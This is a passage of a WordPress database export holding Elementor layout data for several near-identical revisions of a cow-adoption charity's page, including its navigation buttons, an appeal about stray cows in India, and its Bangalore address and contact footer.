tings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11306,1882,'_elementor_page_assets','a:0:{}'),(11309,1883,'_elementor_edit_mode','builder'),(11310,1883,'_elementor_template_type','wp-page'),(11311,1883,'_elementor_version','3.7.8'),(11312,1883,'_wp_page_template','elementor_canvas'),(11313,1883,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11314,1883,'_elementor_page_assets','a:0:{}'),(11316,1884,'_elementor_edit_mode','builder'),(11317,1884,'_elementor_template_type','wp-page'),(11318,1884,'_elementor_version','3.7.8'),(11319,1884,'_wp_page_template','elementor_canvas'),(11320,1884,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11321,1884,'_elementor_page_assets','a:0:{}'),(11323,1885,'_elementor_edit_mode','builder'),(11324,1885,'_elementor_template_type','wp-page'),(11325,1885,'_elementor_version','3.7.8'),(11326,1885,'_wp_page_template','elementor_canvas'),(11327,1885,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt 